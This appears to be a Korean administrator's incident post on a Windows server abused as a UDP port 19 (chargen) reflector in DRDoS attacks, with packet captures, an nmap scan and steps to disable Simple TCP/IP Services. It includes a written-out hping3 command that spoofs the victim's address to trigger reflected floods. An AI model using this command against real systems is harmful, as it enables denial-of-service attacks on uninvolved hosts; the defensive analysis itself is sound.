UDP Port Loopback / UDP 19번 포트 (Windows simple TCP/IP Service 취약점? 인듯)

UDP Port Loopback / UDP 19번 포트 

(Windows simple TCP/IP Service 취약점? 인듯)

처음 발견은 2013년 중순에 처음 발견하였으며 인터넷으로 

해당 취약점의 정의와 서버의 초취를 취해보았다.

증상은 서버의 트래픽이 증가하며 외부 아이피로  UDP 패킷을 발송한다

결론적으로 DOS나 DDOS 공격의 경유지로 사용된다.

DRDOS 공격 방법중의 하나로 경유지라고 표현되는 서버는 reflector (반사체)

라고 불려지며 DOS 나 DDOS 공격자로 오인되기도 한다. (좀비 서버가 아닐수도 있다)

테스트 및 검증

인바운드 (공격자가 경유지IP에 패킷을 하나 보내면)

IP (tos 0x0, ttl 243, id 18759, offset 0, flags [none], proto: UDP (17), length: 29)  xx.185.xx.80.62734 > 115.xx.0.xxx.19: [no cksum] UDP, length 1 E...IG......G.1PsD.......       ....................

아웃바운드 패킷 (경유지 IP는 타켓아이피로 UDP length 1500 내용을 가득 채운 패킷을 보낸다)

18:30:12.100554 IP (tos 0x0, ttl 127, id 22251, offset 0, flags [+], proto: UDP (17), length: 1500)  115.xx.0.xxx.19 > xx.185.xx.80.62734: UDP, length 3051 E...V. ....IsD..G.1P......Y. !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh "#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi #$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij $%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk %&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl &'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm '()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn ()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno )*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop *+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq +,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr ,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs -./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst ./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstu /0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuv 0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvw 123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwx 23456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxy 3456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdef

윈도우즈 서버 19번 포트 오픈 (경유지 서버는 방화벽을 사용중이지 않고 모든 포트들이 열려 있는것으로 보임)

Starting Nmap 5.51 ( http://nmap.org ) at 2013-06-17 11:27 KST Nmap scan report for 115.xx.0.xxx Host is up (0.00067s latency). Not shown: 974 closed ports PORT     STATE    SERVICE 7/tcp    open     echo 9/tcp    open     discard 13/tcp   open     daytime 17/tcp   open     qotd 19/tcp   open     chargen 21/tcp   open     ftp 25/tcp   open     smtp 42/tcp   open     nameserver 53/tcp   open     domain 80/tcp   open     http 110/tcp  open     pop3 135/tcp  open     msrpc 139/tcp  open     netbios-ssn 143/tcp  open     imap 443/tcp  open     https 445/tcp  open     microsoft-ds 1025/tcp open     NFS-or-IIS 1026/tcp open     LSA-or-nterm 1031/tcp open     iad2 1039/tcp open     sbl 3306/tcp open     mysql 3389/tcp open     ms-term-serv 6666/tcp filtered irc 6667/tcp filtered irc 6668/tcp filtered irc 6669/tcp filtered irc

hping3 로 패킷을 변조해서 보내보면 DOS 공격이 가능하며 여러개의 경유지 IP를 알고 있다면 DDOS 공격이 가능하다

hping3  경유지IP -S -c 1 -p 19 --udp -a 타켓아이피

공격자가 경유지IP (즉 19번포트가 오픈된 서버)로 타켓아이피로 아이피를 변경해서 UDP 패킷을 보내면 

2 tier ATTACK

ATTACKER → 경유지IP → 타켓아이피 (VICTIM)

어떤 경로에서든 ATTACKER 아이피는 모르게 된다.

해당 윈도우 점검시 

관리도구 - 서비스 - simple TCP/IP Service 종료 하면 된다 (19번 핵심 포트) 관리도구 - 서비스 - DHCP SERVER 종료 하면 된다 (요것은 사용안하면 종료)

종료하고 나서도 해당 포트로 계속 접근하기 때문에 응답하지 않는다는 메세지를 계속 보낸다. (패킷발생)

10:47:05.316835 IP 115.xx.xx.113 > 189.xxx.xxx.110: ICMP 115.xx.xx.113 udp port 19 unreachable, length 37 E..9pc....w.sDWq...n..I/....E..........e...nsDWq.....   ... 10:47:05.339078 IP 115.xx.xx.113 > 37.xxx.xx.197: ICMP 115.xx.xx.113 udp port 19 unreachable, length 37 E..9pd......sDWq%.6...}Q....E..........X%.6.sDWq~....   ...

패킷이 계속 발생하면 윈도우 방화벽으로 해당 패킷 처리하면 된다. (윈도우 방화벽 사용)

참고사이트

http://cafe.naver.com/synflood/1466